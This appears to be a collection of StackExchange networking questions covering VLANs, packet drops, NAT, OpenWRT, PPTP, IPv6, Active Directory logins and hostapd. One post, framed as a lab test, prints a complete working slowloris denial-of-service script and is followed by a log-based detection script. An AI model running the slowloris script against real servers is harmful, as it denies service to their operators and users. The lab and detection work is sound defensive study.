#StackBounty: #networking #router #dhcp #wireless-access-point #vlan Does enabling VLAN on a Wifi AP require specific hardware requir…

Bounty: 50

I think this is a basic VLAN question but I can’t find an explicit answer.

I have a wifi access point which is capable of broadcasting multiple SSIDs and configuring VLANs (tagged).

My DHCP is a simple TP-LINK router with 4 LAN ports.

The problem is that, if I connect through wifi with a (tagged) VLAN, let’s say PUBLIC, my client doesn’t receive an IP address.

So, although the VLANs are configured at the access point, does the router need to have some special specifications to support the VLANs? If so, which ones?

Bonus question

If I have a switch which supports VLAN, does the router still require the same sort of support?


Get this bounty!!!

#StackBounty: #networking #wireshark #ubuntu-16.04 #tcpdump How to capture "dropped packets" in tcpdump

Bounty: 50

I have a problem with my networking performance. I am using Ubuntu 16.04 on VMware Cloud Server with an E1000 NIC. But I see some dropped packets in the output of the ifconfig command:

root@ubuntu:~# ifconfig ens192
ens192    Link encap:Ethernet  HWaddr 00:50:56:03:25:14  
          inet addr:192.16.1.100  Bcast:192.16.1.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:574749 errors:0 dropped:83 overruns:0 frame:0
          TX packets:76478 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:44109471 (44.1 MB)  TX bytes:19484534 (19.4 MB)

Although only a few packets are dropped, my server is running a real-time online game, so it impacts the clients that are connecting to it.

I have done some research on Google, after which I tried to change the config for the ring buffer, max window size, and so on. But it still drops my packets.

So now I want to capture the dropped packets to analyze exactly what type of packets they are.

I also tried this capture for my view in wireshark:

sudo tcpdump -i ens192 -n -w /var/www/html/logs.pcap -C 1 -Z root

But I don’t think I can see which packets are dropped! I think the dropped packets are discarded before reaching the tcpdump filter.

Can you suggest a method to capture the “dropped packets” above (dropped:83)?

Thanks in advance!



#StackBounty: #networking #iptables #routing #nat change source address of outgoing traffic destined to second network alias of source …

Bounty: 50

I have the following setup:

ip addr:

2: ens4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 01:12:23:34:45:5f brd ff:ff:ff:ff:ff:ff
    inet xxx.xxx.xxx.xxx/24 brd xxx.xxx.xxx.xxx scope global ens4
       valid_lft forever preferred_lft forever
    inet 192.168.0.2/24 scope global ens4:1
       valid_lft forever preferred_lft forever
    inet 192.168.0.3/24 scope global secondary ens4:2
       valid_lft forever preferred_lft forever

I would like to have all traffic from 192.168.0.2 destined to 192.168.0.3 to show as if the source was 192.168.0.3.

The reason is that I have a specific configuration on postgres that I cannot change. This postgres only accepts connections when the source is 192.168.0.3, so if the source becomes 192.168.0.2 the connection will be refused.

The above question is the result of an answer received here: How to add ip route to route traffic through interface when destination is also that interface (it is not possible to change the source IP address with static routes when two aliases are configured within the same network)

The answer to the following question seems to be related to my question, although it does not result in a rule being added: https://unix.stackexchange.com/questions/243451/iptables-change-local-source-address-if-destination-address-matches

I already tried the following nat rules:

iptables -t nat -A POSTROUTING -o ens4 -j MASQUERADE
iptables -A FORWARD -i ens4 --source 192.168.0.2/32 -o 192.168.0.3 -m state --state RELATED,ESTABLISHED -j ACCEPT
iptables -A FORWARD -i ens4 --source 192.168.0.2/32 -o 192.168.0.3 -j ACCEPT

Above derived from here: http://www.revsys.com/writings/quicktips/nat.html



#StackBounty: #networking #virtualbox #virtual-machine #openwrt #gateway Failed to connect to Internet when using an OpenWRT VM as gate…

Bounty: 50

I have set up an OpenWRT x86-64 virtual machine with VirtualBox. The VM has two network interfaces, one for LAN and the other for WAN, both bridged to the Wi-Fi interface of the host (Macbook). I want the VM to be the gateway for devices in the same LAN as the host.

If I change my host’s IP to the OpenWRT VM’s IP range and change host’s gateway to OpenWRT VM, then my host will be able to surf the Internet and I can verify the traffic is through OpenWRT VM.

The same holds for other VMs on the host.

However, for other devices in the same LAN as the host, after configuring their IP and gateway, I find that they can access the OpenWRT VM (for example, access LuCI), but they cannot access the Internet.

I have been working on this for hours and still cannot figure out why. I don’t think it is a problem with the OpenWRT configuration because the host and other VMs on the host work well. Any ideas?



#StackBounty: #networking #security #apache-http-server Detecting slowloris attack by checking Apache log

Bounty: 50

I’m doing a simulation of a slowloris attack on a Debian server running Apache.

The attacking machines are Debian too.

In order to make sure that the slowloris attack was effective, I would like to access the Apache logs and check if the denial of service occurred and if it stopped accepting connections, the state of the buffers, and so on. The times of the attacks are known.

I am using this slowloris code in a lab:
https://github.com/gkbrk/slowloris

http://pastebin.com/CsjTavjN

#!/usr/bin/python
import socket, random, time, sys, argparse, random, logging

parser = argparse.ArgumentParser(description="Slowloris, low bandwidth stress test tool for websites")
parser.add_argument('host',  nargs="?", help="Host to preform stress test on")
parser.add_argument('-p', '--port', default=80, help="Port of webserver, usually 80", type=int)
parser.add_argument('-s', '--sockets', default=150, help="Number of sockets to use in the test", type=int)
parser.add_argument('-v', '--verbose', dest="verbose", action="store_true", help="Increases logging")
parser.add_argument('-ua', '--randuseragents', dest="randuseragent", action="store_true", help="Randomizes user-agents with each request")
parser.add_argument('-x', '--useproxy', dest="useproxy", action="store_true", help="Use a SOCKS5 proxy for connecting")
parser.add_argument('--proxy-host', default="127.0.0.1", help="SOCKS5 proxy host")
parser.add_argument('--proxy-port', default="8080", help="SOCKS5 proxy port", type=int)
parser.set_defaults(verbose=False)
parser.set_defaults(randuseragent=False)
parser.set_defaults(useproxy=False)
args = parser.parse_args()

if len(sys.argv)<=1:
    parser.print_help()
    sys.exit(1)

if not args.host:
    print("Host required!")
    parser.print_help()
    sys.exit(1)

if args.useproxy:
    print("Using SOCKS5 proxy for connecting...")
    try:
        import socks
        socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, args.proxy_host, args.proxy_port)
        socket.socket = socks.socksocket
    except ImportError:
        print("Socks Proxy Library Not Available!")
if args.verbose == True:
    logging.basicConfig(format="[%(asctime)s] %(message)s", datefmt="%d-%m-%Y %H:%M:%S", level=logging.DEBUG)
else:
    logging.basicConfig(format="[%(asctime)s] %(message)s", datefmt="%d-%m-%Y %H:%M:%S", level=logging.INFO)

list_of_sockets = []
user_agents = [
    "Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0",
    "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50",
    "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14",
    "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
    "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393"
]

def init_socket(ip):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(4)
    s.connect((ip,args.port))

    s.send("GET /?{} HTTP/1.1\r\n".format(random.randint(0, 2000)).encode("utf-8"))
    if args.randuseragent:
        s.send("User-Agent: {}\r\n".format(random.choice(user_agents)).encode("utf-8"))
    else:
        s.send("User-Agent: {}\r\n".format(user_agents[0]).encode("utf-8"))
    s.send("{}\r\n".format("Accept-language: en-US,en,q=0.5").encode("utf-8"))
    return s

def main():
    ip = args.host
    socket_count = args.sockets
    logging.info("Attacking %s with %s sockets.", ip, socket_count)

    logging.info("Creating sockets...")
    for _ in range(socket_count):
        try:
            logging.debug("Creating socket nr %s", _)
            s = init_socket(ip)
        except socket.error:
            break
        list_of_sockets.append(s)

    while True:
        logging.info("Sending keep-alive headers... Socket count: %s", len(list_of_sockets))
        for s in list(list_of_sockets):
            try:
                s.send("X-a: {}\r\n".format(random.randint(1, 5000)).encode("utf-8"))
            except socket.error:
                list_of_sockets.remove(s)

        for _ in range(socket_count - len(list_of_sockets)):
            logging.debug("Recreating socket...")
            try:
                s = init_socket(ip)
                if s:
                    list_of_sockets.append(s)
            except socket.error:
                break
        time.sleep(15)

if __name__ == "__main__":
    main()

Does Apache provide such information? Where to check in Debian? Any suggestions on what else to check?
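
One way to do the log check asked about above, as an added example that is not part of the original post or of the slowloris project: a Python triage script for three artifacts Apache 2.4 can leave when request workers are tied up by slow headers (the AH00161 MaxRequestWorkers line in the error log, 408 entries with an empty "-" request line in the access log, and workers in the R state in the mod_status `server-status?auto` scoreboard). The log lines, scoreboard, time window, thresholds and function names are all constructed for illustration.

```python
import re
from collections import Counter
from datetime import datetime, timedelta, timezone

# Constructed sample data, not taken from a real server. On Debian the real
# files are /var/log/apache2/access.log and /var/log/apache2/error.log.
ACCESS_LOG = "\n".join(
    ['198.51.100.23 - - [12/Apr/2017:10:14:58 +0200] "GET / HTTP/1.1" 200 3380 "-" "Mozilla/5.0"',
     '198.51.100.99 - - [12/Apr/2017:10:15:40 +0200] "-" 408 0 "-" "-"',
     '203.0.113.7 - - [12/Apr/2017:09:02:11 +0200] "-" 408 0 "-" "-"']
    + ['203.0.113.7 - - [12/Apr/2017:10:15:%02d +0200] "-" 408 0 "-" "-"' % s
       for s in range(30, 38)]
)
ERROR_LOG = (
    "[Wed Apr 12 10:15:21.482913 2017] [mpm_prefork:error] [pid 1042] AH00161: "
    "server reached MaxRequestWorkers setting, consider raising the "
    "MaxRequestWorkers setting\n"
    "[Wed Apr 12 10:16:02.000412 2017] [core:notice] [pid 1042] AH00094: "
    "Command line: '/usr/sbin/apache2'\n"
)
# Constructed "server-status?auto" body: 140 slots reading a request (R),
# 6 sending a reply (W), 4 in keep-alive (K), 106 open slots (.).
STATUS_AUTO = ("BusyWorkers: 150\nIdleWorkers: 0\nScoreboard: "
               + "R" * 140 + "W" * 6 + "K" * 4 + "." * 106 + "\n")

# The known time of the lab run (assumed window for this sample).
TZ = timezone(timedelta(hours=2))
WINDOW_START = datetime(2017, 4, 12, 10, 15, 0, tzinfo=TZ)
WINDOW_END = datetime(2017, 4, 12, 10, 20, 0, tzinfo=TZ)

ACCESS_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) ')
ERROR_RE = re.compile(r'^\[([^\]]+)\] \[[^\]]+\] \[pid \d+[^\]]*\] AH00161: ')


def timeouts_by_client(access_text, start, end):
    """Count 408 responses with an empty request line per client in [start, end].

    An access-log entry is only written when the connection ends, so these
    lines appear after a held connection is timed out, not while it is open.
    """
    hits = Counter()
    for line in access_text.splitlines():
        m = ACCESS_RE.match(line)
        if not m:
            continue
        ip, stamp, request, status = m.groups()
        when = datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S %z")
        if status == "408" and request == "-" and start <= when <= end:
            hits[ip] += 1
    return hits


def worker_exhaustion_times(error_text):
    """Return the timestamps (naive, server local time) of AH00161 lines."""
    times = []
    for line in error_text.splitlines():
        m = ERROR_RE.match(line)
        if m:
            times.append(datetime.strptime(m.group(1), "%a %b %d %H:%M:%S.%f %Y"))
    return times


def reading_ratio(status_auto_text):
    """Fraction of allocated scoreboard slots in state R, or None if absent."""
    for line in status_auto_text.splitlines():
        if line.startswith("Scoreboard: "):
            board = line.split(": ", 1)[1].strip()
            slots = len(board) - board.count(".")  # "." is an open slot
            return board.count("R") / slots if slots else 0.0
    return None


def triage(access_text, error_text, status_text, start, end,
           min_timeouts=5, max_reading=0.5):
    """Combine the three signals; both thresholds are illustrative assumptions."""
    per_ip = timeouts_by_client(access_text, start, end)
    ratio = reading_ratio(status_text)
    return {
        "suspect_clients": sorted(ip for ip, n in per_ip.items() if n >= min_timeouts),
        "workers_exhausted": bool(worker_exhaustion_times(error_text)),
        "reading_ratio": ratio,
        "slow_header_pattern": ratio is not None and ratio >= max_reading,
    }


if __name__ == "__main__":
    print(triage(ACCESS_LOG, ERROR_LOG, STATUS_AUTO, WINDOW_START, WINDOW_END))
```

The scoreboard has to be sampled while the connections are still held open, which requires mod_status to be enabled and reachable from the monitoring host.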



#StackBounty: #linux #networking #fedora #networkmanager #pptp Fedora 25, pptp connects but not working, too many transferred packets

Bounty: 50

After the update to Fedora 25, one of my PPTP connections works strangely. The remote net is not available.

It connects and successfully gets a remote net IP address. While connected, nothing is available in the remote net, but the internet works fine. After a few minutes the connection breaks by itself.

I’ve noticed a strange thing: while the pptp connection is on, there are too many TX packets transferred:

ppp0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST>  mtu 1400
        inet 192.168.1.96  netmask 255.255.255.255  destination ___.__.___.___
        ppp  txqueuelen 3  (Point-to-Point Protocol)
        RX packets 10  bytes 172 (172.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 9864041  bytes 5842982146 (5.4 GiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

In 10-15 seconds it shows up to 5.4 GiB of packets. It grows very fast.

The same happens if firewalld is disabled.

I’m using Network-Manager to connect to pptp.

[root@c0rp ~]# lsb_release -a
LSB Version:    :core-4.1-amd64:core-4.1-noarch:cxx-4.1-amd64:cxx-4.1-noarch:desktop-4.1-amd64:desktop-4.1-noarch:languages-4.1-amd64:languages-4.1-noarch:printing-4.1-amd64:printing-4.1-noarch
Distributor ID: Fedora
Description:    Fedora release 25 (Twenty Five)
Release:    25
Codename:   TwentyFive
[root@c0rp ~]# uname -a
Linux c0rp 4.10.8-200.fc25.x86_64 #1 SMP Fri Mar 31 13:20:22 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

Can someone help me investigate the problem, please?



#StackBounty: #networking #wireless-networking #router #dd-wrt #ipv6 Hosts connected to DD-WRT router running radvd get IPv6 addresses …

Bounty: 100

I’m trying to get IPv6 working on my local network. I know my ISP (Comcast) supports it because anything connected to the modem/router combo I rent from them gets assigned an IPv6 address and communicates using the protocol (can connect to ipv6.google.com and gets 20/20 on http://test-ipv6.com/).

However, when I connect my own router (Netgear WNDR3800, if it’s relevant) running DD-WRT to the Comcast modem/router combo, none of the hosts can communicate over IPv6, although they get assigned IPv6 addresses in the prefix I was delegated by Comcast.

It seems to fail before it even leaves the LAN. Attempting to ping the IPv6 address of the router returns “Destination host unreachable”. My guess would be that I’m missing a route somewhere, but I am not familiar enough with IPv6 or routing to know how to test that theory or how to resolve it.

Technical details:

Router: WNDR3800 running DD-WRT v24-sp2. Its IPv6 configuration looks like this:

[Image: screenshot of the router's IPv6 configuration]

Router ifconfig:

root@DD-WRT:~# ifconfig
ath1      Link encap:Ethernet  HWaddr [redacted]
          inet6 addr: fe80::224e:7fff:fe74:13da/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:188122 errors:0 dropped:0 overruns:0 frame:0
          TX packets:227134 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:26587839 (25.3 MiB)  TX bytes:211385503 (201.5 MiB)

br0       Link encap:Ethernet  HWaddr [redacted]
          inet addr:192.168.2.1  Bcast:192.168.2.255  Mask:255.255.255.0
          inet6 addr: fe80::224e:7fff:fe74:13d8/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:190093 errors:0 dropped:0 overruns:0 frame:0
          TX packets:217213 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:24491040 (23.3 MiB)  TX bytes:204922896 (195.4 MiB)

br0:0     Link encap:Ethernet  HWaddr [redacted]
          inet addr:169.254.255.1  Bcast:169.254.255.255  Mask:255.255.0.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1

eth0      Link encap:Ethernet  HWaddr [redacted]
          inet6 addr: fe80::224e:7fff:fe74:13d8/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1989 errors:0 dropped:0 overruns:0 frame:0
          TX packets:21615 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:569599 (556.2 KiB)  TX bytes:3297349 (3.1 MiB)
          Interrupt:4

eth1      Link encap:Ethernet  HWaddr [redacted]
          inet addr:10.0.0.59  Bcast:10.0.0.255  Mask:255.255.255.0
          inet6 addr: 2601:601:XXXX:XXXX:XXXX:XXXX:XXXX:13d9/64 Scope:Global
          inet6 addr: fe80::224e:7fff:fe74:13d9/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:216381 errors:0 dropped:0 overruns:0 frame:0
          TX packets:181622 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:202350364 (192.9 MiB)  TX bytes:25482727 (24.3 MiB)
          Interrupt:5

ipconfig from Windows 8.1 host connected to the router:

C:\Users\seth>ipconfig

Windows IP Configuration


Wireless LAN adapter Wi-Fi:

   Connection-specific DNS Suffix  . :
   IPv6 Address. . . . . . . . . . . : 2601:601:XXXX:XXXX:XXXX:XXXX:XXXX:75c3
   Temporary IPv6 Address. . . . . . : 2601:601:XXXX:XXXX:XXXX:XXXX:XXXX:2b13
   Link-local IPv6 Address . . . . . : fe80::18b5:93d6:d9db:75c3%4
   IPv4 Address. . . . . . . . . . . : 192.168.2.100
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.2.1

(unrelated interfaces removed from output. lo, VMWare, etc)



#StackBounty: #14.04 #networking #password #active-directory #likewise Problem with PBISOpen and Ubuntu 14.04LTS

Bounty: 100

I’m testing openpbis version 8.3 and I have an authentication problem when I try to open a new session on Ubuntu 14.04 LTS, not on the local network but only on a distant network.

Adding the computer to Active Directory is very simple and I didn’t have any problem, on my local and distant networks.

But when I want to open a session with my Active Directory account, I get the message “wrong password”.

So I reset the password in Active Directory and tried again to open the session.

I enter the default password, no problem; the system asks me to enter a new password, there is no message and everything seems to be OK. After this, I entered my login and password and I got the message “wrong password”.

If I use the same login and password on a Windows 7 PC, there is no problem opening a session.

I’m trying to debug openpbis:

Make Sure You Are Joined to the Domain
/opt/pbis/bin/domainjoin-cli query
Name = chou-l64
Domain = mydomain.LAN
Distinguished Name = CN=CHOU-L64,CN=Computers,DC=mydomain,DC=lan

###

Check Whether You Are Using a Valid Logon Form
MYDOMAIN\username
works

###

Clear the Cache
/opt/pbis/bin/ad-cache --delete-all
ok

###

Check the Status of the PBIS Authentication Service
/opt/pbis/bin/lwsm status lsass
running (container: 1436)

###

Check Communication between the PBIS Service and AD
/opt/pbis/bin/get-dc-name mydomain.lan

Printing LWNET_DC_INFO fields:
===============================
dwDomainControllerAddressType = 24
dwFlags = 312
dwVersion = 5
wLMToken = 65535
wNTToken = 65535
pszDomainControllerName = robinson.mydomain.lan
pszDomainControllerAddress = 172.16.0.253
pucDomainGUID(hex) = 21 40 5F 7F EB EA 19 4E 8E 42 0E 13 96 19 AF EB 
pszNetBIOSDomainName = MYDOMAIN
pszFullyQualifiedDomainName = mydomain.lan
pszDnsForestName = mydomain.lan
pszDCSiteName = Lyon
pszClientSiteName = Paris
pszNetBIOSHostName = ROBINSON
pszUserName = <EMPTY>

###

Verify that PBIS Can Find a User in AD
/opt/pbis/bin/find-user-by-name MYDOMAIN.lan\dupond
User info (Level-0):
====================
Name:              dupond
SID:               S-1-5-21-545202174-1067577326-598125351-6851
Uid:               1657281219
Gid:               1657274881
Gecos:             dupond dupond
Shell:             /bin/bash
Home dir:          /home/dupond
Logon restriction: NO

/opt/pbis/bin/find-user-by-name mydomain.lan\admindupont
User info (Level-0):
====================
Name:              admindupont
SID:               S-1-5-21-545202174-1067577326-598125351-6830
Uid:               1657281198
Gid:               1657274881
Gecos:             Administrateur dupont
Shell:             /bin/bash
Home dir:          /home/admindupont
Logon restriction: NO

###

Make Sure the AD Authentication Provider Is Running

/opt/pbis/bin/get-status
LSA Server Status:

Compiled daemon version: 8.3.0.3287
Packaged product version: 8.3.3287.68880
Uptime:        0 days 1 hours 47 minutes 43 seconds

[Authentication provider: lsa-activedirectory-provider]

    Status:        Online
    Mode:          Un-provisioned
    Domain:        MYDOMAIN.LAN
    Domain SID:    S-1-5-21-545202174-1067577326-598125351
    Forest:        mydomain.lan
    Site:          Lyon
    Online check interval:  300 seconds
    [Trusted Domains: 1]

    [Domain: MYDOMAIN]

            DNS Domain:       mydomain.lan
            Netbios name:     MYDOMAIN
            Forest name:      mydomain.lan
            Trustee DNS name: 
            Client site name: Paris
            Domain SID:       S-1-5-21-545202174-1067577326-598125351
            Domain GUID:      00000000-0000-0000-0000-000000000000
            Trust Flags:      [0x001d]
                              [0x0001 - In forest]
                              [0x0004 - Tree root]
                              [0x0008 - Primary]
                              [0x0010 - Native]
            Trust type:       Up Level
            Trust Attributes: [0x0000]
            Trust Direction:  Primary Domain
            Trust Mode:       In my forest Trust (MFT)
            Domain flags:     [0x0003]
                              [0x0001 - Primary]
                              [0x0002 - Offline]

            [Domain Controller (DC) Information]

                    DC Name:              robinson.mydomain.lan
                    DC Address:           172.16.0.253
                    DC Site:              Lyon
                    DC Flags:             [0x00000138]
                    DC Is PDC:            no
                    DC is time server:    no
                    DC has writeable DS:  yes
                    DC is Global Catalog: no
                    DC is running KDC:    yes

###

Run the id Command to Check the User
id mydomain.lan\dupond
uid=1657281219(dupond) gid=1657274881(utilisa.^du^domaine groupes=1657274881(utilisa.^du^domaine)

###

/etc/nsswitch.conf
passwd:         compat lsass
group:          compat lsass
shadow:         compat
hosts:          files dns
networks:       files
protocols:      db files
services:       db files
ethers:         db files
rpc:            db files
netgroup:       nis

###

/etc/pam.d/less common-session

session [default=1]                     pam_permit.so
session requisite                       pam_deny.so
session required                        pam_permit.so
session optional        pam_umask.so
session required        pam_unix.so 
session [success=ok default=ignore]     pam_lsass.so 
session optional        pam_mount.so 
session optional        pam_systemd.so 
session optional                        pam_ck_connector.so nox11

When I try to open a session on this PC, I get these messages in /var/log/auth.log:

Jul 23 15:22:26 chou-l64 login[1728]: [lsass-pam] [module:pam_lsass]pam_sm_authenticate error [login:dupond][error code:40355]
Jul 23 15:22:29 chou-l64 login[1728]: FAILED LOGIN (1) on '/dev/tty1' FOR 'dupond', Authentication failure
Jul 23 15:24:25 chou-l64 sshd[11898]: [lsass-pam] [module:pam_lsass]pam_sm_authenticate error [login:dupond][error code:40355]
Jul 23 15:24:26 chou-l64 sshd[11896]: error: PAM: Authentication failure for dupond from localhost
Jul 23 15:24:34 chou-l64 sshd[11919]: [lsass-pam] [module:pam_lsass]pam_sm_authenticate error [login:dupond][error code:40355]
Jul 23 15:24:39 chou-l64 sshd[11922]: [lsass-pam] [module:pam_lsass]pam_sm_authenticate error [login:dupond][error code:40022]
Jul 23 15:24:41 chou-l64 sshd[11896]: message repeated 2 times: [ error: PAM: Authentication failure for dupond from localhost]
Jul 23 15:24:50 chou-l64 sshd[11896]: [lsass-pam] [module:pam_lsass]pam_sm_authenticate error [login:dupond][error code:40022]
Jul 23 15:24:52 chou-l64 sshd[11896]: Failed password for dupond from 127.0.0.1 port 39657 ssh2
Jul 23 15:24:58 chou-l64 sshd[11896]: [lsass-pam] [module:pam_lsass]pam_sm_authenticate error [login:dupond][error code:40355]
Jul 23 15:25:01 chou-l64 sshd[11896]: Failed password for dupond from 127.0.0.1 port 39657 ssh2

How can I resolve this problem?



#StackBounty: #networking #ssh #scp #wsl WSL – Can't scp-ssh a file from a remote machine to a local machine

Bounty: 50

I use WSL Ubuntu 16.04.02 (fully updated and upgraded) and I can’t secure-copy a file via an scp-ssh sequence.

I already created host keys in WSL via sudo ssh-keygen -A and I already tried to log in while the OpenSSH server is on, on WSL (I made sure of that with sudo service ssh start).

My problem:

sudo scp /var/www/html/tiesto USER@IP:/mnt/c/Users/USER/Desktop/

Brings:

connection timed out

As you can see, I try to copy the file “tiesto” from inside a remote machine into my local WSL machine, but the connection times out.

This does not happen when I try to do the same action between two other machines.

Things I already tried to solve it:

  • I already made sure OpenSSH is installed (sudo apt-get install openssh-server).
  • I tried to remove fail2ban (the only IPS I installed) but still couldn’t scp.
  • I didn’t change the native ssh port from 22 to something else.
  • I tried scp’ing into this machine from 2 different remote machines and in both cases had the same error.

My question:

What might be missing (if anything) in WSL that I could try to add in some way so as to bring back the scp-ssh functionality?



#StackBounty: #networking #16.04 #server #hostapd Is there a way to debug wireless access point issues that was set up with hostapd?

Bounty: 50

I am trying to set up a wireless access point with a home PC. I replaced my old Intel wifi link 5100 with an Atheros AR9462. I recently did a fresh Ubuntu Server 16.04 install.

To set up the wireless access point I installed hostapd and created a simple configuration:

# cat /etc/hostapd/hostapd.conf 
interface=wlp3s0
driver=nl80211
ssid=mytestnetwork
channel=1
auth_algs=1
ignore_broadcast_ssid=0
wpa=0

And here is how my network interfaces are configured:

# cat /etc/network/interfaces
source /etc/network/interfaces.d/*

auto lo
iface lo inet loopback

auto enp1s0
iface enp1s0 inet dhcp

auto wlp3s0
iface wlp3s0 inet static
address 10.10.0.1
netmask 255.255.255.0

After these configurations, I rebooted the device. My network is active (checked via /etc/init.d/networking status). hostapd (checked via service hostapd status) seems to be running fine. However, I cannot even detect the wireless access point from any other device.

My wireless card is functioning in master mode:

# iwconfig
wlp3s0    IEEE 802.11abgn  Mode:Master  Tx-Power=19 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off

lo        no wireless extensions.

enp1s0    no wireless extensions.

My network hardware results look like the following:

# lshw -C network
  *-network               
       description: Ethernet interface
       product: RTL8111/8168/8411 PCI Express Gigabit Ethernet Controller
       vendor: Realtek Semiconductor Co., Ltd.
       physical id: 0
       bus info: pci@0000:01:00.0
       logical name: enp1s0
       version: 07
       serial: 00:e0:4c:68:18:fd
       size: 1Gbit/s
       capacity: 1Gbit/s
       width: 64 bits
       clock: 33MHz
       capabilities: pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation
       configuration: autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3LK-NAPI duplex=full firmware=rtl8168e-3_0.0.4 03/27/12 ip=192.168.1.6 latency=0 link=yes multicast=yes port=MII speed=1Gbit/s
       resources: irq:120 ioport:e000(size=256) memory:a0004000-a0004fff memory:a0000000-a0003fff
  *-network
       description: Wireless interface
       product: AR9462 Wireless Network Adapter
       vendor: Qualcomm Atheros
       physical id: 0
       bus info: pci@0000:03:00.0
       logical name: wlp3s0
       version: 01
       serial: 44:c3:06:31:a7:b0
       width: 64 bits
       clock: 33MHz
       capabilities: pm msi pciexpress bus_master cap_list rom ethernet physical wireless
       configuration: broadcast=yes driver=ath9k driverversion=4.4.0-62-generic firmware=N/A ip=10.10.0.1 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
       resources: irq:18 memory:81200000-8127ffff memory:81280000-8128ffff

How can I troubleshoot this issue further and find out what is going wrong?

